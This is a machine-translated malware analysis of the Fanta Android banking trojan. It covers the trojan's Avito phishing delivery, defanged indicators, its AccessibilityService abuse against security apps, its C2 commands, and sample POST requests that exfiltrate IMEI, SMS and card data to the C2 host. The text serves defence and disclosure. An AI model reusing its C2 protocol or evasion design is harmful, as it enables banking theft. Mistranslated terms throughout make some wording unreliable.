Jednog dana želite nešto prodati na Avito-u i nakon što ste objavili detaljan opis svog proizvoda (na primjer, RAM modul), dobit ćete ovu poruku:
Kada otvorite vezu, vidjet ćete naizgled bezazlenu stranicu koja vas, sretnog i uspješnog prodavca, obavještava da je kupovina obavljena:
Nakon što kliknete na dugme „Nastavi“, APK datoteka sa ikonom i imenom koje uliva povjerenje će se preuzeti na vaš Android uređaj. Instalirali ste aplikaciju koja je iz nekog razloga tražila AccessibilityService prava, onda se pojavilo nekoliko prozora koji su brzo nestali i... To je to.
Odete provjeriti stanje, ali iz nekog razloga vaša bankarska aplikacija ponovo traži podatke o kartici. Nakon unosa podataka, događa se nešto strašno: iz nekog vam još nejasnog razloga, novac počinje nestajati s vašeg računa. Pokušavate da rešite problem, ali vaš telefon se opire: pritiska tastere „Nazad” i „Home”, ne isključuje se i ne dozvoljava vam da aktivirate nikakve bezbednosne mere. Kao rezultat toga, ostajete bez novca, vaša roba nije kupljena, zbunjeni ste i pitate se: šta se dogodilo?
Odgovor je jednostavan: postali ste žrtva Android Trojanca Fanta, člana Flexnet porodice. Kako se to dogodilo? Hajde sada da objasnimo.
Autori: Andrey Polovinkin, mlađi specijalista za analizu zlonamjernog softvera, Ivan Pisarev, specijalista za analizu zlonamjernog softvera.
Neke statistike
Flexnet porodica Android trojanaca prvi put je postala poznata još 2015. godine. Tokom prilično dugog perioda aktivnosti, porodica se proširila na nekoliko podvrsta: Fanta, Limebot, Lipton, itd. Trojanac, kao i infrastruktura povezana s njim, ne miruju: razvijaju se nove efikasne šeme distribucije - u našem slučaju, visokokvalitetne phishing stranice usmjerene na određenog korisnika-prodavača, a programeri Trojanaca prate moderne trendove u pisanje virusa - dodavanje nove funkcionalnosti koja omogućava efikasniju krađu novca sa zaraženih uređaja i zaobilaženje zaštitnih mehanizama.
Kampanja opisana u ovom članku namijenjena je korisnicima iz Rusije, mali broj zaraženih uređaja zabilježen je u Ukrajini, a još manje u Kazahstanu i Bjelorusiji.
Iako je Flexnet u areni Android Trojanaca već više od 4 godine i detaljno su ga proučavali mnogi istraživači, još uvijek je u dobrom stanju. Počevši od januara 2019., potencijalni iznos štete je veći od 35 miliona rubalja - i to samo za kampanje u Rusiji. U 2015. godini razne verzije ovog Android trojanca su se prodavale na podzemnim forumima, gdje se mogao pronaći i izvorni kod trojanca sa detaljnim opisom. To znači da je statistika štete u svijetu još impresivnija. Nije loš pokazatelj za tako starca, zar ne?
Od prodaje do prevare
Kao što se može vidjeti iz prethodno prikazanog screenshot-a phishing stranice za internet servis za postavljanje oglasa Avito, pripremljena je za određenu žrtvu. Očigledno, napadači koriste jedan od Avitovih parsera, koji izvlači broj telefona i ime prodavca, kao i opis proizvoda. Nakon proširenja stranice i pripreme APK datoteke, žrtvi se šalje SMS s njegovim imenom i vezom na phishing stranicu koja sadrži opis njegovog proizvoda i iznos primljen od „prodaje“ proizvoda. Klikom na dugme korisnik dobija zlonamerni APK fajl - Fanta.
Studija domene shcet491[.]ru pokazala je da je delegirana na Hostingerove DNS servere:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
Datoteka domenske zone sadrži unose koji upućuju na IP adrese 31.220.23[.]236, 31.220.23[.]243 i 31.220.23[.]235. Međutim, zapis primarnog resursa domene (A zapis) ukazuje na server sa IP adresom 178.132.1[.]240.
IP adresa 178.132.1[.]240 nalazi se u Holandiji i pripada hostu WorldStream. IP adrese 31.220.23[.]235, 31.220.23[.]236 i 31.220.23[.]243 nalaze se u UK i pripadaju zajedničkom hosting serveru HOSTINGER. Koristi se kao diktafon openprov-ru. Sljedeći domeni su također riješeni na IP adresu 178.132.1[.]240:
- sdelka-ru[.]ru
- tovar-av[.]ru
- av-tovar[.]ru
- ru-sdelka[.]ru
- shcet382[.]ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- viplata291[.]ru
- perevod273[.]ru
- perevod901[.]ru
Treba napomenuti da su linkovi u sljedećem formatu bili dostupni sa gotovo svih domena:
http://(www.){0,1}<%domain%>/[0-9]{7}
Ovaj šablon takođe uključuje link iz SMS poruke. Na osnovu istorijskih podataka, ustanovljeno je da jedna domena odgovara nekoliko linkova u gore opisanom obrascu, što ukazuje da je jedan domen korišćen za distribuciju Trojanca na nekoliko žrtava.
Idemo malo naprijed: Trojanac preuzet putem linka iz SMS-a koristi adresu kao kontrolni server onusedseddohap[.]club. Ova domena je registrovana 2019-03-12, a počevši od 2019-04-29, APK aplikacije su stupile u interakciju sa ovim domenom. Na osnovu podataka dobijenih od VirusTotal-a, sa ovim serverom je komuniciralo ukupno 109 aplikacija. Sama domena je razriješena na IP adresu 217.23.14[.]27, koji se nalazi u Holandiji i u vlasništvu je hostera WorldStream. Koristi se kao diktafon namecheap. Domeni su također riješeni na ovu IP adresu bad-racoon[.]club (počevši od 2018) i bad-racoon[.]uživo (počevši od 2018.). Sa domenom bad-racoon[.]club više od 80 APK fajlova je u interakciji bad-racoon[.]uživo - više od 100.
Generalno, napad napreduje na sljedeći način:
Šta je ispod Fantinog poklopca?
Kao i mnogi drugi Android trojanci, Fanta je sposobna čitati i slati SMS poruke, slati USSD zahtjeve i prikazivati vlastite prozore na vrhu aplikacija (uključujući i bankarske). Međutim, arsenal funkcionalnosti ove porodice je stigao: Fanta je počela da koristi AccessibilityService u različite svrhe: čitanje sadržaja obavijesti iz drugih aplikacija, sprječavanje otkrivanja i zaustavljanje izvršavanja Trojanca na zaraženom uređaju itd. Fanta radi na svim verzijama Androida ne mlađim od 4.4. U ovom članku ćemo detaljnije pogledati sljedeći uzorak Fante:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Odmah nakon lansiranja
Odmah nakon pokretanja, trojanac skriva svoju ikonu. Aplikacija može raditi samo ako naziv zaraženog uređaja nije na listi:
- android_x86
- VirtualBox
- Nexus 5X (glava glava)
- Nexus 5 (žilet)
Ova provjera se vrši u glavnom servisu Trojanca - MainService. Prilikom prvog pokretanja, konfiguracijski parametri aplikacije se inicijaliziraju na zadane vrijednosti (format za pohranjivanje konfiguracijskih podataka i njihovo značenje će biti razmotreni kasnije), a novi zaraženi uređaj se registruje na kontrolnom serveru. HTTP POST zahtjev s tipom poruke će biti poslan serveru register_bot i informacije o zaraženom uređaju (Android verzija, IMEI, broj telefona, naziv operatera i kod zemlje u kojoj je operater registriran). Adresa služi kao kontrolni server hXXp://onuseseddohap[.]club/controller.php. Kao odgovor, server šalje poruku koja sadrži polja bot_id, bot_pwd, server — aplikacija sprema ove vrijednosti kao parametre CnC servera. Parametar server opciono ako polje nije primljeno: Fanta koristi adresu za registraciju - hXXp://onuseseddohap[.]club/controller.php. Funkcija promjene CnC adrese može se koristiti za rješavanje dva problema: za ravnomjernu raspodjelu opterećenja između nekoliko servera (ako postoji veliki broj zaraženih uređaja, opterećenje na neoptimiziranom web serveru može biti veliko), kao i za korištenje alternativni server u slučaju kvara jednog od CnC servera.
Ako dođe do greške prilikom slanja zahtjeva, trojanac će ponoviti proces registracije nakon 20 sekundi.
Nakon što je uređaj uspješno registrovan, Fanta će korisniku prikazati sljedeću poruku:
Važna napomena: služba je pozvana Sigurnost sistema — naziv trojanskog servisa i nakon klika na dugme u redu Otvorit će se prozor s postavkama pristupačnosti zaraženog uređaja, gdje korisnik mora dodijeliti prava pristupačnosti za zlonamjernu uslugu:
Čim se korisnik uključi AccessibilityService, Fanta dobija pristup sadržaju prozora aplikacije i radnjama koje se u njima izvode:
Odmah nakon što dobije prava pristupačnosti, trojanac traži administratorska prava i prava za čitanje obavještenja:
Koristeći AccessibilityService, aplikacija simulira pritiske tipki, čime sebi daje sva potrebna prava.
Fanta kreira više instanci baze podataka (koje će biti opisane kasnije) neophodnih za pohranjivanje podataka o konfiguraciji, kao i informacija prikupljenih u procesu o zaraženom uređaju. Za slanje prikupljenih informacija, trojanac kreira zadatak koji se ponavlja dizajniran za preuzimanje polja iz baze podataka i primanje komande od kontrolnog servera. Interval za pristup CnC-u se postavlja ovisno o verziji Androida: u slučaju 5.1, interval će biti 10 sekundi, u suprotnom 60 sekundi.
Da bi primila komandu, Fanta postavlja zahtjev GetTask na server za upravljanje. Kao odgovor, CnC može poslati jednu od sljedećih naredbi:
| tim | Opis |
|---|---|
| 0 | Pošalji SMS poruku |
| 1 | Uputite telefonski poziv ili USSD komandu |
| 2 | Ažurira parametar interval |
| 3 | Ažurira parametar presretnuti |
| 6 | Ažurira parametar smsManager |
| 9 | Počnite prikupljati SMS poruke |
| 11 | Vratite telefon na fabrička podešavanja |
| 12 | Omogući/onemogući evidentiranje kreiranja dijaloškog okvira |
Fanta također prikuplja obavijesti iz 70 bankarskih aplikacija, sistema za brzo plaćanje i e-novčanika i pohranjuje ih u bazu podataka.
Pohranjivanje konfiguracijskih parametara
Za pohranjivanje konfiguracijskih parametara, Fanta koristi standardni pristup za Android platformu - Preferences-fajlovi. Postavke će biti sačuvane u fajlu pod nazivom podešavanja. Opis sačuvanih parametara nalazi se u tabeli ispod.
| ime | Zadana vrijednost | Moguće vrijednosti | Opis |
|---|---|---|---|
| id | 0 | integer | Bot ID |
| server | hXXp://onuseseddohap[.]club/ | URL | Kontrolna adresa servera |
| pwd | - | niz | Lozinka servera |
| interval | 20 | integer | Vremenski interval. Označava koliko dugo treba odgoditi sljedeće zadatke:
|
| presretnuti | sve | sve/tel.broj | Ako je polje jednako nizu sve ili telNumber, tada će primljena SMS poruka biti presretna od strane aplikacije i neće biti prikazana korisniku |
| smsManager | 0 | 0/1 | Omogućite/onemogućite aplikaciju kao zadanog primaoca SMS-a |
| readDialog | lažan | Tačno/netačno | Omogući/onemogući evidentiranje događaja AccessibilityEvent |
Fanta također koristi datoteku smsManager:
| ime | Zadana vrijednost | Moguće vrijednosti | Opis |
|---|---|---|---|
| pckg | - | niz | Naziv korištenog menadžera SMS poruka |
Interakcija sa bazama podataka
Tokom svog rada, trojanac koristi dvije baze podataka. Imenovana baza podataka a koristi se za pohranjivanje raznih informacija prikupljenih s telefona. Druga baza podataka je imenovana fanta.db i koristi se za spremanje postavki odgovornih za kreiranje phishing prozora dizajniranih za prikupljanje informacija o bankovnim karticama.
Trojanac koristi bazu podataka а za pohranjivanje prikupljenih informacija i evidentiranje vaših radnji. Podaci se pohranjuju u tabeli rezanje. Da kreirate tabelu, koristite sledeći SQL upit:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)Baza podataka sadrži sljedeće informacije:
1. Evidentiranje pokretanja zaraženog uređaja porukom Telefon se uključio!
2. Obavještenja od aplikacija. Poruka se generira prema sljedećem šablonu:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Podaci o bankovnoj kartici iz phishing obrazaca koje je kreirao Trojanac. Parametar VIEW_NAME može biti jedno od sljedećeg:
- AliExpress
- Avito
- Google Play
- Razno
Poruka se evidentira u formatu:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Dolazne/odlazne SMS poruke u formatu:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>
5. Informacije o paketu koji kreira dijaloški okvir u formatu:
(<%Package name%>)<%Package information%>
Primjer tabele rezanje:
Jedna od funkcionalnosti Fante je prikupljanje informacija o bankovnim karticama. Prikupljanje podataka se odvija kroz kreiranje phishing prozora prilikom otvaranja bankarskih aplikacija. Trojanac kreira phishing prozor samo jednom. Informacije da je prozor prikazan korisniku pohranjene su u tabeli podešavanja u bazi podataka fanta.db. Za kreiranje baze podataka koristite sljedeći SQL upit:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);Sva polja tabele podešavanja po defaultu inicijalizirano na 1 (kreirajte prozor za krađu identiteta). Nakon što korisnik unese svoje podatke, vrijednost će biti postavljena na 0. Primjer polja tabele podešavanja:
- can_login — polje je odgovorno za prikaz obrasca prilikom otvaranja bankarske aplikacije
- prva_banka - nije korišteno
- can_avito — polje je odgovorno za prikaz obrasca prilikom otvaranja aplikacije Avito
- can_ali — polje je odgovorno za prikaz obrasca prilikom otvaranja Aliexpress aplikacije
- can_another — polje je odgovorno za prikaz obrasca prilikom otvaranja bilo koje aplikacije sa liste: Yula, Pandao, Drom Auto, Novčanik. Kartice za popust i bonus, Aviasales, Booking, Trivago
- can_card — polje je odgovorno za prikaz obrasca prilikom otvaranja Google Play
Interakcija sa serverom za upravljanje
Mrežna interakcija sa serverom za upravljanje odvija se preko HTTP protokola. Za rad s mrežom, Fanta koristi popularnu Retrofit biblioteku. Zahtjevi se šalju na: hXXp://onuseseddohap[.]club/controller.php. Adresa servera se može promijeniti prilikom registracije na serveru. Kolačići se mogu poslati kao odgovor sa servera. Fanta šalje sledeće zahteve serveru:
- Registracija bota na kontrolnom serveru se dešava jednom, pri prvom pokretanju. Na server se šalju sljedeći podaci o zaraženom uređaju:
· kolačić — kolačići primljeni sa servera (podrazumevana vrednost je prazan niz)
· način — string konstanta register_bot
· prefiks — cjelobrojna konstanta 2
· version_sdk — formira se prema sljedećem šablonu: /(Avit)
· IMEI — IMEI zaraženog uređaja
· zemlja — kod zemlje u kojoj je operater registrovan, u ISO formatu
· broj - telefonski broj
· operator — ime operateraPrimjer zahtjeva poslanog serveru:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>Kao odgovor na zahtjev, server mora vratiti JSON objekt koji sadrži sljedeće parametre:
· bot_id — ID zaraženog uređaja. Ako je bot_id jednak 0, Fanta će ponovo izvršiti zahtjev.
bot_pwd — lozinka za server.
server — adresa kontrolnog servera. Opcioni parametar. Ako parametar nije naveden, koristit će se adresa sačuvana u aplikaciji.Primjer JSON objekta:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Zahtjev za primanje naredbe od servera. Na server se šalju sljedeći podaci:
· kolačić — kolačići primljeni sa servera
· ponuda — id zaraženog uređaja koji je primljen prilikom slanja zahtjeva register_bot
· pwd —lozinka za server
· divice_admin — polje određuje da li su stečena administratorska prava. Ako su stečena administratorska prava, polje je jednako 1, inače 0
· pristupačnost — Status rada usluge pristupačnosti. Ako je servis pokrenut, vrijednost je 1, inače 0
· SMSManager — pokazuje da li je trojanac omogućen kao podrazumevana aplikacija za primanje SMS-a
· ekran — prikazuje u kom je stanju ekran. Vrijednost će biti postavljena 1, ako je ekran uključen, inače 0;Primjer zahtjeva poslanog serveru:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>U zavisnosti od naredbe, server može vratiti JSON objekt s različitim parametrima:
· tim Pošalji SMS poruku: Parametri sadrže broj telefona, tekst SMS poruke i ID poruke koja se šalje. Identifikator se koristi prilikom slanja poruke na server sa tipom setSmsStatus.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }· tim Uputite telefonski poziv ili USSD komandu: Telefonski broj ili komanda dolazi u tijelu odgovora.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }· tim Promjena parametra intervala.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }· tim Promijenite parametar presretanja.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }· tim Promijenite polje SmsManager.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }· tim Prikupljajte SMS poruke sa zaraženog uređaja.
{ "response": [ { "mode": 9 } ], "status":"ok" }· tim Vratite telefon na fabrička podešavanja:
{ "response": [ { "mode": 11 } ], "status":"ok" }· tim Promijenite ReadDialog parametar.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Slanje poruke sa tipom setSmsStatus. Ovaj zahtjev se postavlja nakon što se naredba izvrši Pošalji SMS poruku. Zahtjev izgleda ovako:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>- Učitavanje sadržaja baze podataka. Jedan red se prenosi po zahtjevu. Na server se šalju sljedeći podaci:
· kolačić — kolačići primljeni sa servera
· način — string konstanta setSaveInboxSms
· ponuda — id zaraženog uređaja koji je primljen prilikom slanja zahtjeva register_bot
· tekst — tekst u trenutnom zapisu baze podataka (polje d sa stola rezanje u bazi podataka а)
· broj — naziv trenutnog zapisa baze podataka (polje p sa stola rezanje u bazi podataka а)
· sms_mode — cjelobrojna vrijednost (polje m sa stola rezanje u bazi podataka а)Zahtjev izgleda ovako:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>Ako se uspješno pošalje na server, red će biti obrisan iz tabele. Primjer JSON objekta koji je vratio server:
{ "response":[], "status":"ok" }
Interakcija sa AccessibilityServiceom
AccessibilityService je implementiran kako bi se Android uređaji lakše koristili osobama sa invaliditetom. U većini slučajeva potrebna je fizička interakcija za interakciju s aplikacijom. AccessibilityService vam omogućava da ih uradite programski. Fanta koristi uslugu za kreiranje lažnih prozora u bankarskim aplikacijama i sprečavanje korisnika da otvore sistemske postavke i neke aplikacije.
Koristeći funkcionalnost AccessibilityServicea, trojanac prati promjene elemenata na ekranu zaraženog uređaja. Kao što je prethodno opisano, postavke Fanta sadrže parametar odgovoran za evidentiranje operacija s dijaloškim okvirima - readDialog. Ako je ovaj parametar postavljen, u bazu podataka će se dodati informacije o imenu i opisu paketa koji je pokrenuo događaj. Trojanac izvodi sljedeće radnje kada se događaji pokrenu:
- Simulira pritiskanje tipki za povratak i početak u sljedećim slučajevima:
· ako korisnik želi ponovo pokrenuti svoj uređaj
· ako korisnik želi obrisati aplikaciju „Avito“ ili promijeniti prava pristupa
· ako se na stranici spominje aplikacija “Avito”.
· prilikom otvaranja aplikacije Google Play Protect
· kada otvarate stranice s postavkama usluge AccessibilityService
· kada se pojavi dijalog Sigurnost sistema
· kada otvarate stranicu s postavkama "Crtaj preko druge aplikacije".
· prilikom otvaranja stranice „Aplikacije“, „Oporavak i resetovanje“, „Resetovanje podataka“, „Resetovanje postavki“, „Panel za programere“, „Posebno. mogućnosti“, „Posebne mogućnosti“, „Posebna prava“
· ako je događaj generiran od strane određenih aplikacija.Lista aplikacija
- android
- Master Lite
- Čist gospodar
- Clean Master za x86 CPU
- Upravljanje dozvolama za Meizu aplikaciju
- MIUI Security
- Clean Master - Antivirus & Cache i Garbage Cleaner
- Roditeljski nadzor i GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Web Security Beta
- Čistač virusa, Antivirus, Čistač (MAX Security)
- Mobile AntiVirus Security PRO
- Avast antivirus i besplatna zaštita 2019
- Mobile Security MegaFon
- AVG zaštita za Xperia
- Mobile Security
- Malwarebytes antivirus i zaštita
- Antivirus za Android 2019
- Security Master - Antivirus, VPN, AppLock, Booster
- AVG antivirus za Huawei tablet System Manager
- Samsung pristupačnost
- Samsung Smart Manager
- Učitelj sigurnosti
- Speed Booster
- dr.web
- Dr.Web sigurnosni prostor
- Dr.Web Mobile Control Center
- Dr.Web Security Space Life
- Dr.Web Mobile Control Center
- Antivirus i mobilna sigurnost
- Kaspersky Internet Security: Antivirus i zaštita
- Kaspersky Battery Life: Saver & Booster
- Kaspersky Endpoint Security - zaštita i upravljanje
- AVG Antivirus besplatni 2019 – Zaštita za Android
- Antivirusni Android
- Norton Mobile Security i Antivirus
- Antivirus, firewall, VPN, mobilna sigurnost
- Mobile Security: antivirus, VPN, zaštita od krađe
- Antivirus za Android
- Ako se prilikom slanja SMS poruke na kratki broj traži dozvola, Fanta simulira klik na potvrdni okvir Zapamti izbor i dugme to send.
- Kada pokušate da oduzmete administratorska prava Trojancu, on zaključava ekran telefona.
- Sprečava dodavanje novih administratora.
- Ako je antivirusna aplikacija dr.web detektovala pretnju, Fanta imitira pritiskanje dugmeta zanemariti.
- Trojanac simulira pritiskanje tipke za povratak i početak ako je događaj generirala aplikacija Samsung Device Care.
- Fanta kreira phishing prozore sa obrascima za unos podataka o bankovnim karticama ako je pokrenuta aplikacija sa liste koja obuhvata oko 30 različitih internet servisa. Među njima: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, itd.
Phishing forme
Fanta analizira koje aplikacije rade na zaraženom uređaju. Ako je otvorena aplikacija od interesa, trojanac iznad svih ostalih prikazuje prozor za krađu identiteta, koji je obrazac za unos podataka o bankovnoj kartici. Korisnik mora unijeti sljedeće podatke:
- Nomer karty
- Datum isteka kartice
- CVV
- Ime vlasnika kartice (ne za sve banke)
Ovisno o pokrenutoj aplikaciji, prikazat će se različiti prozori za krađu identiteta. Ispod su primjeri nekih od njih:
AliExpress:
Avito:
Za neke druge aplikacije, npr. Google Play Market, Aviasales, Pandao, Booking, Trivago:
Kako je zaista bilo
Na sreću, ispostavilo se da je osoba koja je primila SMS poruku opisanu na početku članka stručnjak za sajber sigurnost. Stoga se prava, nerediteljska verzija razlikuje od one ranije ispričane: osoba je primila zanimljiv SMS, nakon čega ga je dala Grupi-IB Threat Hunting Intelligence timu. Rezultat napada je ovaj članak. Srećan kraj, zar ne? Međutim, ne završavaju se sve priče tako uspješno, a da vaša ne bi ličila na rediteljski rez s gubitkom novca, u većini slučajeva dovoljno je pridržavati se sljedećih dugo opisanih pravila:
- nemojte instalirati aplikacije za mobilni uređaj sa Android OS-om iz bilo kojeg drugog izvora osim Google Playa
- Prilikom instaliranja aplikacije obratite posebnu pažnju na prava koja aplikacija traži
- obratite pažnju na ekstenzije preuzetih datoteka
- redovno instalirajte ažuriranja Android OS-a
- ne posjećujte sumnjive resurse i ne preuzimajte datoteke odatle
- Ne klikajte na linkove primljene u SMS porukama.
izvor: www.habr.com